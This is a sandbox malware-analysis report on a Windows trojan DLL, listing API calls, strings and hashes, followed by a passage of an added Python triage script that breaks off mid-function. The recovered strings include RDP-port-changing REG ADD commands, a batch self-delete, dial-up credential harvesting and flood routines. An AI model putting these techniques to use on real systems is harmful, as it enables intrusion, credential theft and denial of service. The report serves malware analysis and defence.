                                • Instruction ID: afa899698315f790dea508b65044e70b833291bd3a009e442af8b39958c29264
                                • Opcode Fuzzy Hash: 4162b8fd09a8058dfffab31c4ebf9cf9939f72c70a79160d24adbb6f6ac3f189
                                • Instruction Fuzzy Hash: 781182B2B68D170AFB1C55ACEC797793683E384319F1A9B3C570BC62C0DDBD69481198
                                Similarity
                                • API ID: htons$strcspn$strstr$inet_addr$strncpy$htonlsetsockopt$CountSleepSocketTickprintfrandsendtowsprintf
                                • String ID: %d.%d.%d.%d$192.168.1.244$@$E$P$http://
                                • API String ID: 322722939-1061493658
                                • Opcode ID: fa133e97be830d63c3937d69d0e00783affe932c38cfb30cb5e04117bf83879f
                                • Instruction ID: 029872f007aae8b741d3009860af6db6cc3886bdaffc2e790e906b1155b7fa43
                                • Opcode Fuzzy Hash: fa133e97be830d63c3937d69d0e00783affe932c38cfb30cb5e04117bf83879f
                                • Instruction Fuzzy Hash: DFE1E3715083859AE320CB74CC41BABB7E5FFC4344F004A1DFA9997291DA74AA49CB97
                                Strings
                                • %s, xrefs: 100053CD
                                • %s, xrefs: 1000542A
                                • GET %s HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/chpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: zh-cnAccept-Encoding: gzip, deflateIf-Modified-, xrefs: 10005416
                                • http://, xrefs: 100051B4, 10005205, 10005214
                                Similarity
                                • API ID: strcspn$printfstrstr$ExitThreadUserclosesocketstrncpy$Sleepinet_addr$connectgethostbynamehtonsinet_ntoasendsocketsprintf
                                • String ID: %s$%s$GET %s HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/chpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: zh-cnAccept-Encoding: gzip, deflateIf-Modified-$http://
                                • API String ID: 3360081097-1844242639
                                • Opcode ID: a09e518b96f0db453f2d109b9515bce755ecc3f272282edc9d1fbb50c6695935
                                • Instruction ID: e8874cd066fd205268a75987e0b1d8bfdcdc385e397420bfea7b2cf98142489c
                                • Opcode Fuzzy Hash: a09e518b96f0db453f2d109b9515bce755ecc3f272282edc9d1fbb50c6695935
                                • Instruction Fuzzy Hash: 9F91E6325043146BE304DB74CC84AAB7BE9EFC9351F044A18FA5693290DFB5EA49C795
                                Similarity
                                • API ID: strcspn$strstr$printfstrncpy$CountExitThreadTickUserinet_addr$CleanupSleepSocketclosesocketgethostbynameinet_ntoarandsendtosetsockoptsrandtime
                                • String ID: %s$http://
                                • API String ID: 2910787541-1591606595
                                • Opcode ID: 714e4b3f82d11a8d2cdf065614fefdc8eb5a61599fc4361ed26ed8b059713b7f
                                • Instruction ID: 34865b7dc30fd38a5ae5f0f06fbf564a450e17f044507f999930ee5d5a8d3fda
                                • Opcode Fuzzy Hash: 714e4b3f82d11a8d2cdf065614fefdc8eb5a61599fc4361ed26ed8b059713b7f
                                • Instruction Fuzzy Hash: 78A1E5315043516BE314DB74CC84AAB7BEAFFC8350F404A2DF65697290EFB49A48CB96
                                APIs
                                  • Part of subcall function 10011F80: GetCurrentProcess.KERNEL32(00000028,?,?,10009CF0,?,00000000,00000000,00000001), ref: 10011F90
                                  • Part of subcall function 10011F80: OpenProcessToken.ADVAPI32(00000000,?,10009CF0,?,00000000,00000000,00000001), ref: 10011F97
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00001F40,00001F40), ref: 100119D6
                                • LocalAlloc.KERNEL32 ref: 10011A04
                                • Sleep.KERNEL32(00000001), ref: 10011A19
                                • Process32First.KERNEL32(00000000,?), ref: 10011A28
                                • OpenProcess.KERNEL32(00000410,00000000,?,?,00000000,?), ref: 10011A4B
                                • EnumProcessModules.PSAPI(00000000,00000040,00000004,?,?,00000000,?), ref: 10011A85
                                • GetModuleFileNameExA.PSAPI(00000000,00000040,?,00000104,00000000,00000040,00000004,?,?,00000000,?), ref: 10011A9D
                                • GetPriorityClass.KERNEL32(00000000,00000000,00000040,?,00000104,00000000,00000040,00000004,?,?,00000000,?), ref: 10011AA9
                                • wsprintfA.USER32 ref: 10011B3F
                                • lstrlen.KERNEL32(?,?,?,?,00000002,00000000,00001F40,00001F40), ref: 10011B75
                                • lstrlen.KERNEL32(?,?,00000002,00000000,00001F40,00001F40), ref: 10011B7E
                                • lstrlen.KERNEL32(?,?,00000002,00000000,00001F40,00001F40), ref: 10011B87
                                Similarity
                                • API ID: Process$lstrlen$Open$AllocClassCreateCurrentEnumFileFirstLocalModuleModulesNamePriorityProcess32SleepSnapshotTokenToolhelp32wsprintf
                                • String ID: SYSTEM$SeDebugPrivilege
                                • API String ID: 1285126458-3052852743
                                • Opcode ID: 5e3ec088feefaa2b3cf88e8578a73bbd5f76fc6d3470febee6665a52a73cde3f
                                • Instruction ID: 0b961047b44daba82c00bbc082a7763861cb1e17bb1e44bbf086e1eb6c632ac9
                                • Opcode Fuzzy Hash: 5e3ec088feefaa2b3cf88e8578a73bbd5f76fc6d3470febee6665a52a73cde3f
                                • Instruction Fuzzy Hash: 29B1A2712083459BE718CB24CC91AEFB3E6FBC4704F41492CFA8597240EB79E949CB96
                                Similarity
                                • API ID: rand$htons$inet_addrsetsockopt$ExitSleepSocketStartupThreadUserhtonlsendtosprintf
                                • String ID: %d.%d.%d.%d$@$E$P$d
                                • API String ID: 872198723-3606021318
                                • Opcode ID: a2e921a84f5a9370c1cbf23c0c7c279e28e6e32964bf80e14801a405c00669c0
                                • Instruction ID: 8a7fd5c6b9d9dc2a36ee797d2ff7afdd41ddcd881716b64bea6de97d131c0ef0
                                • Opcode Fuzzy Hash: a2e921a84f5a9370c1cbf23c0c7c279e28e6e32964bf80e14801a405c00669c0
                                • Instruction Fuzzy Hash: 1181C0701483959AE310CF64CC80BABBBE6FFC9704F00491DF699972A1DBB49909CB5B
                                Similarity
                                • API ID: strcspn$strstr$strncpy$ExitThreadUserinet_addr$Sleepclosesocketgethostbynamehtonsprintfrandsendtosocketsrandtime
                                • String ID: %s:%d$http://
                                • API String ID: 3986318173-1702654977
                                • Opcode ID: b18c302a20b414ba0b999612ed69bf70c16094a003d45a29b836c5755b60ace6
                                • Instruction ID: 13eb3fa513dba6a830c19df937ef2a65af92b20ba7af4015ac3123da307f7ed1
                                • Opcode Fuzzy Hash: b18c302a20b414ba0b999612ed69bf70c16094a003d45a29b836c5755b60ace6
                                • Instruction Fuzzy Hash: BD81F3325043155BE704DF748C84AAB7AEAEFC9350F044A1DFA5697290EFB4DE08C795
                                APIs
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 10010CF2
                                • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10010D07
                                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 10010D29
                                • ControlService.ADVAPI32(00000000,00000001,?), ref: 10010D4A
                                • Sleep.KERNEL32(00000320), ref: 10010D5D
                                • DeleteService.ADVAPI32(00000000), ref: 10010D64
                                • RegDeleteKeyA.ADVAPI32(80000002,?), ref: 10010DCB
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 10010E1C
                                • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10010E33
                                • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 10010E48
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 10010E4F
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 10010E61
                                • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10010E78
                                • LockServiceDatabase.ADVAPI32(00000000), ref: 10010E89
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002,00000000), ref: 10010EAE
                                • OpenServiceA.ADVAPI32(00000000,00000000,000F01FF), ref: 10010EC5
                                • LockServiceDatabase.ADVAPI32(00000000), ref: 10010ED6
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 10010EFB
                                • OpenServiceA.ADVAPI32(00000000,00000000,000F01FF), ref: 10010F12
                                • ControlService.ADVAPI32(00000000,00000001,?), ref: 10010F28
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 10010F2F
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002,00000000), ref: 10010F3E
                                • OpenServiceA.ADVAPI32(00000000,00000000,000F01FF), ref: 10010F51
                                • LockServiceDatabase.ADVAPI32(00000000), ref: 10010F5E
                                • ChangeServiceConfigA.ADVAPI32(00000000,000000FF,00000002,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10010F7B
                                • UnlockServiceDatabase.ADVAPI32(00000000), ref: 10010F82
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 10010F89
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 10010F90
                                • Sleep.KERNEL32(000001F4), ref: 10010F9B
                                Strings
                                • SYSTEM\CurrentControlSet\Services\, xrefs: 10010D70
                                Similarity
                                • API ID: Service$Open$Manager$CloseDatabaseHandle$Lock$ControlDeleteSleep$ChangeConfigQueryStartStatusUnlock
                                • String ID: SYSTEM\CurrentControlSet\Services\
                                • API String ID: 1632965242-3886778518
                                • Opcode ID: 415cbfae56c863db6d808fe5706d43c21076e051c094c4dc012044e5d47c7044
                                • Instruction ID: 7f1d72a6b6236b21d302d541352c045c2c8a2f4db1f642aaa59284ae598933f1
                                • Opcode Fuzzy Hash: 415cbfae56c863db6d808fe5706d43c21076e051c094c4dc012044e5d47c7044
                                • Instruction Fuzzy Hash: F3712F31744365AFF731CB644C8AFBE76A5EB44B51F100228FA59AB2D0DFF08C858A60
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(?,00000105), ref: 100074C9
                                • strchr.MSVCRT ref: 100074DE
                                • lstrcpy.KERNEL32(00000001), ref: 100074E9
                                • lstrcat.KERNEL32(?,?), ref: 10007501
                                • lstrcat.KERNEL32(?,\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk), ref: 10007510
                                • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000023,00000000), ref: 10007520
                                • wsprintfA.USER32 ref: 10007540
                                • GetVersionExA.KERNEL32 ref: 1000756C
                                • ??2@YAPAXI@Z.MSVCRT(00001000), ref: 10007592
                                • GetPrivateProfileSectionNamesA.KERNEL32(00000000,00001000,?), ref: 100075C8
                                • GetPrivateProfileStringA.KERNEL32(00000000,DialParamsUID,00000000,?,00000100,?), ref: 10007645
                                • lstrcmp.KERNEL32(?,00000000), ref: 1000766A
                                • lstrcpy.KERNEL32(?,00000200), ref: 100076A5
                                • lstrcpy.KERNEL32(?,00000100), ref: 100076BA
                                • GetPrivateProfileStringA.KERNEL32(00000000,PhoneNumber,00000000,?,00000100,?), ref: 100076EE
                                • GetPrivateProfileStringA.KERNEL32(00000000,Device,00000000,?,00000100,?), ref: 10007706
                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,00000000,?,?,00000000,?,?), ref: 10007755
                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,?,00000000,?,?,00000000,?,?), ref: 1000775B
                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?), ref: 10007761
                                • lstrlen.KERNEL32(00000000,?,00000000,?,?), ref: 1000776A
                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 1000779D
                                  • Part of subcall function 100073D0: wsprintfA.USER32 ref: 1000743C
                                  • Part of subcall function 100073D0: LsaFreeMemory.ADVAPI32(?), ref: 1000746A
                                  • Part of subcall function 100073D0: LsaFreeMemory.ADVAPI32(?), ref: 10007494
                                Strings
                                • Microsoft\Network\Connections\pbk\rasphone.pbk, xrefs: 1000752D
                                • Device, xrefs: 10007700
                                • %s\%s, xrefs: 1000753A
                                • \Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk, xrefs: 1000750A
                                • PhoneNumber, xrefs: 100076E8
                                • Documents and Settings\, xrefs: 100074CF
                                • DialParamsUID, xrefs: 1000763F
                                Similarity
                                • API ID: ??3@PrivateProfile$Stringlstrcpy$FreeMemorylstrcatwsprintf$??2@DirectoryFolderNamesPathSectionSpecialVersionWindowslstrcmplstrlenstrchr
                                • String ID: %s\%s$Device$DialParamsUID$Documents and Settings\$Microsoft\Network\Connections\pbk\rasphone.pbk$PhoneNumber$\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk
                                • API String ID: 4167786638-3033193607
                                • Opcode ID: 9523fa19fb7e428b8343631ba9dac47c68eb2c2225a73468dc24c4b5fb51928c
                                • Instruction ID: f0af7ff8ab0846974cf933d747a26daa36609d74f32ab5fd33a69faa2bd6b488
                                • Opcode Fuzzy Hash: 9523fa19fb7e428b8343631ba9dac47c68eb2c2225a73468dc24c4b5fb51928c
                                • Instruction Fuzzy Hash: 4E8180B1504385AFE724CF14CC84FABB3E9FBC4740F004A1DF68A97251DB79A9458B66
                                APIs
                                • LocalAlloc.KERNEL32 ref: 100121A0
                                • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,00000040), ref: 100121D0
                                • RegEnumKeyExA.ADVAPI32(00000040,00000000,?,?,00000000,00000000,00000000,00000000), ref: 100121F6
                                • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,?), ref: 10012320
                                • RegQueryValueExA.ADVAPI32(?,DisplayName,00000000,00000007,00000007,?), ref: 1001234F
                                • RegQueryValueExA.ADVAPI32(?,UninstallString,00000000,00000007,?,00000001), ref: 1001236F
                                • strstr.MSVCRT ref: 100123F4
                                • strstr.MSVCRT ref: 1001240B
                                • lstrlen.KERNEL32(?), ref: 10012420
                                • lstrlen.KERNEL32(?), ref: 10012429
                                • LocalSize.KERNEL32(00000000), ref: 10012437
                                • LocalReAlloc.KERNEL32(00000000,00000000,00000042), ref: 10012445
                                • lstrlen.KERNEL32(?), ref: 10012456
                                • lstrlen.KERNEL32(?), ref: 10012474
                                • lstrlen.KERNEL32(?), ref: 10012486
                                • lstrlen.KERNEL32(?), ref: 100124AF
                                • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 1001251F
                                • RegCloseKey.ADVAPI32(00000040), ref: 10012536
                                • LocalReAlloc.KERNEL32(00000000,00010000,00000042), ref: 10012544
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Local$Alloc$EnumOpenQueryValuestrstr$CloseSize
                                • String ID: DisplayName$Microsoft$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString$Windows
                                • API String ID: 2254360075-2665300987
                                • Opcode ID: 5921ea012968ccbaa212433031b476476b24bbda40d625663b2bfe521a7a65ef
                                • Instruction ID: 0094e60b34b218b2d156cdba79d742c6c5f7379f88ed07e575cc6fad288f1158
                                • Opcode Fuzzy Hash: 5921ea012968ccbaa212433031b476476b24bbda40d625663b2bfe521a7a65ef
                                • Instruction Fuzzy Hash: B2B1D6B16043855BD715CF24CC90BABB7DAEFC8310F444A1DFA9997280EAB4EE49C751
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1000CD25
                                • lstrcpy.KERNEL32(00000000,@echo off), ref: 1000CD38
                                • lstrcat.KERNEL32(00000000,@del 3596799a1543bc9f.aqq), ref: 1000CD56
                                • lstrcat.KERNEL32(00000000,@del "), ref: 1000CD68
                                • lstrcat.KERNEL32(00000000,00000000), ref: 1000CD77
                                • lstrcat.KERNEL32(00000000,"), ref: 1000CD86
                                • lstrcat.KERNEL32(00000000,@del ), ref: 1000CD95
                                • lstrcat.KERNEL32(00000000,?), ref: 1000CDA4
                                • lstrcat.KERNEL32(00000000,@exit), ref: 1000CDB3
                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 1000CDC9
                                • WriteFile.KERNEL32(00000000,?,00000800,?,00000000), ref: 1000CDE6
                                • CloseHandle.KERNEL32(00000000), ref: 1000CDED
                                • WinExec.KERNEL32(?,00000000), ref: 1000CDFA
                                • ExitProcess.KERNEL32 ref: 1000CE02
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$File$CloseCreateExecExitHandleModuleNameProcessWritelstrcpy
                                • String ID: @exit$"$@del $@del "$@del 3596799a1543bc9f.aqq$@echo off$afc9fe2f418b00a0.bat
                                • API String ID: 433470039-873414491
                                • Opcode ID: 4d7fb6a1bfc2b650f2c5ea7031f5b9c7acfa89c5468e2b03b9c1a4a40a83eb2a
                                • Instruction ID: 0a7f92bd5935df41e05b6577e6ab9151d6494e46dd2793a7553bbccc7f6feb7a
                                • Opcode Fuzzy Hash: 4d7fb6a1bfc2b650f2c5ea7031f5b9c7acfa89c5468e2b03b9c1a4a40a83eb2a
                                • Instruction Fuzzy Hash: 15419072519790ABEB11CB60CCC5FD67BA9EF8A310F044D98E6845F044DB74B628CB93
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: strcspn$strstr$strncpy$ExitSleepThreadUseratoi
                                • String ID: Cache-Control: no-cacheReferer: www.qq.com$GET$^*%%RFTGYHJIRTG*(&^%DFG.asp$http://
                                • API String ID: 3047203434-1551478559
                                • Opcode ID: e412d0c515886a73b93e1546e4aa2403f2198e990efffa37e164aea4bc5c3113
                                • Instruction ID: 1c951fb19393ce52af4e69efaf2d32add5348a8144f4b5db51f252c0556f43f7
                                • Opcode Fuzzy Hash: e412d0c515886a73b93e1546e4aa2403f2198e990efffa37e164aea4bc5c3113
                                • Instruction Fuzzy Hash: 715127325102601BD704DAB48C409DF7B9AEFC6250F02461DFA9697190DE68EA4987EA
                                APIs
                                • LoadCursorA.USER32(00000000,00000000), ref: 1000FC53
                                  • Part of subcall function 10010520: ReleaseDC.USER32(?,?), ref: 1001053A
                                  • Part of subcall function 10010520: GetDesktopWindow.USER32 ref: 10010540
                                  • Part of subcall function 10010520: GetDC.USER32(00000000), ref: 1001054D
                                • GetDesktopWindow.USER32 ref: 1000FCA2
                                • GetDC.USER32(00000000), ref: 1000FCAF
                                • GetTickCount.KERNEL32 ref: 1000FCC3
                                • GetSystemMetrics.USER32(00000000), ref: 1000FCED
                                • GetSystemMetrics.USER32(00000001), ref: 1000FCF4
                                • CreateCompatibleDC.GDI32(?), ref: 1000FD12
                                • CreateCompatibleDC.GDI32(?), ref: 1000FD1B
                                • CreateCompatibleDC.GDI32(00000000), ref: 1000FD24
                                • CreateCompatibleDC.GDI32(00000000), ref: 1000FD2A
                                • CreateDIBSection.GDI32(?,?,00000000,0000005C,00000000,00000000), ref: 1000FD89
                                • CreateDIBSection.GDI32(?,?,00000000,00000060,00000000,00000000), ref: 1000FD9A
                                • CreateDIBSection.GDI32(?,?,00000000,00000078,00000000,00000000), ref: 1000FDAE
                                • SelectObject.GDI32(?,?), ref: 1000FDC4
                                • SelectObject.GDI32(?,?), ref: 1000FDCE
                                • SelectObject.GDI32(?,?), ref: 1000FDDE
                                • SetRect.USER32(00000034,00000000,00000000,?,?), ref: 1000FDEE
                                • ??2@YAPAXI@Z.MSVCRT(00000002), ref: 1000FDFD
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Create$Compatible$ObjectSectionSelect$DesktopMetricsSystemWindow$??2@CountCursorLoadRectReleaseTick
                                • String ID: I=u
                                • API String ID: 339399666-3032091488
                                • Opcode ID: 95fef00004b0c454b9c3dee54ddf510e5743c9dddf09359fd0f5be7a5ad76e64
                                • Instruction ID: 3f0a5bb4dce6945fbb730085926d6daddf735a738384ac0d5d646b014a7e3649
                                • Opcode Fuzzy Hash: 95fef00004b0c454b9c3dee54ddf510e5743c9dddf09359fd0f5be7a5ad76e64
                                • Instruction Fuzzy Hash: 6681E3B0504B459FE320CF69C884A27FBE9FB88704F004A1DE59A87B50DBB9F8458F91
                                APIs
                                  • Part of subcall function 1000D900: RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,76F923A0,?,?), ref: 1000D96C
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,00000001), ref: 100091B1
                                • lstrcat.KERNEL32(?,rar.exe), ref: 100091ED
                                • PathIsDirectoryA.SHLWAPI(?), ref: 100091F0
                                • lstrcpy.KERNEL32(?,?), ref: 10009209
                                • lstrcat.KERNEL32(?,.rar), ref: 10009218
                                • lstrcpy.KERNEL32(?,?), ref: 10009220
                                • lstrcat.KERNEL32(?,1007A0CC), ref: 1000922C
                                • wsprintfA.USER32 ref: 10009248
                                • lstrcpy.KERNEL32(?,?), ref: 1000926C
                                • PathRemoveExtensionA.SHLWAPI(?,?,?,?,?,?,?,00000001), ref: 10009277
                                • lstrcat.KERNEL32(?,.rar), ref: 10009287
                                • wsprintfA.USER32 ref: 1000929C
                                • ShellExecuteA.SHELL32(00000000,open,?,?,00000000,00000000), ref: 100092C0
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$Pathwsprintf$DirectoryExecuteExtensionOpenRemoveShelllstrlen
                                • String ID: .rar$WinRAR\shell\open\command$a %s %s$a -r %s %s$open$rar.exe
                                • API String ID: 1594156495-1032977547
                                • Opcode ID: b9f267640147a2f838cf6fb1a9db996f7ba10a8c87d01a4d513f73deca81dfce
                                • Instruction ID: afa0eefc70f7be5220eaeba01fbc78bff8034a503fb8c3defdcf7e753fe2bb58
                                • Opcode Fuzzy Hash: b9f267640147a2f838cf6fb1a9db996f7ba10a8c87d01a4d513f73deca81dfce
                                • Instruction Fuzzy Hash: A64162B2104399AEE724DBA0CC84FEB77ADEBD4704F008D1CF785A7140DA74A609CB66
                                APIs
                                • malloc.MSVCRT ref: 1000B44D
                                • atoi.MSVCRT(?), ref: 1000B46C
                                • CreateFileA.KERNEL32(c:\3389.bat,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 1000B4A0
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 1000B530
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 1000B54C
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,00000000), ref: 1000B570
                                Strings
                                • REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d , xrefs: 1000B4AB
                                • REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d , xrefs: 1000B577
                                • /f , xrefs: 1000B4D3, 1000B5AA
                                • c:\3389.bat, xrefs: 1000B49B
                                • C:\3389.bat, xrefs: 1000B68A
                                • del %0, xrefs: 1000B630
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Write$Createatoimalloc
                                • String ID: /f $C:\3389.bat$REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d $REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d $c:\3389.bat$del %0
                                • API String ID: 664794413-4273509073
                                • Opcode ID: 4a27424fdb0e6fed942fe30b310200175d70302a2057ec4e7743d62d519ea0e6
                                • Instruction ID: fb98ae05d316c3fd0aebd7eca0209f5c260241d4b25d467fdc2f7558c52bb64f
                                • Opcode Fuzzy Hash: 4a27424fdb0e6fed942fe30b310200175d70302a2057ec4e7743d62d519ea0e6
                                • Instruction Fuzzy Hash: B961B2721147846AE324CB74CC45BFB77E9EBC8310F104E2DF796932D1DAB9AA088B55
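The two records above for the self-delete routine (GetModuleFileNameA, lstrcat of "@echo off" / "@del ..." / "@exit", WriteFile, WinExec, ExitProcess at 1000CD25) and the RDP port-change routine (CreateFileA on c:\3389.bat, the two REG ADD ... PortNumber lines, "del %0" at 1000B44D) both work the same way: build a batch script in memory, write it to disk, run it. The Python below is an added example by the editor, not code from the Joe Sandbox report or from the sample, for triaging such a recovered .bat: it tokenises each line under C-runtime argv rules (which is what turns the report's Terminal" "Server quoting into the key path Terminal Server), lists the files deleted, decodes each REG ADD and reports the PortNumber values written. The script bodies, their line breaks, the path C:\path with space\sample.exe and the port 13389 are constructed assumptions; the report only shows the literal fragments and that the port is produced by atoi from an operator-supplied argument.

```python
"""Triage of the batch scripts that the sampled functions write and run.
Added example by the editor, not code from the report or the sample. The
script texts below are reconstructed from the report's literals; their line
breaks, the path C:\\path with space\\sample.exe and the port 13389 are
assumptions (the sample fills the port in from atoi of an operator argument)."""


def argv_split(line: str) -> list:
    """Split a cmd/reg.exe command line into arguments the way the C runtime does:
    a double quote toggles an in-quotes state and is dropped, so the report's
    Terminal" "Server becomes the single argument  Terminal Server.
    Backslash-quote escapes are not handled (none occur in these scripts)."""
    args, cur, in_quotes, started = [], [], False, False
    for ch in line:
        if ch == '"':
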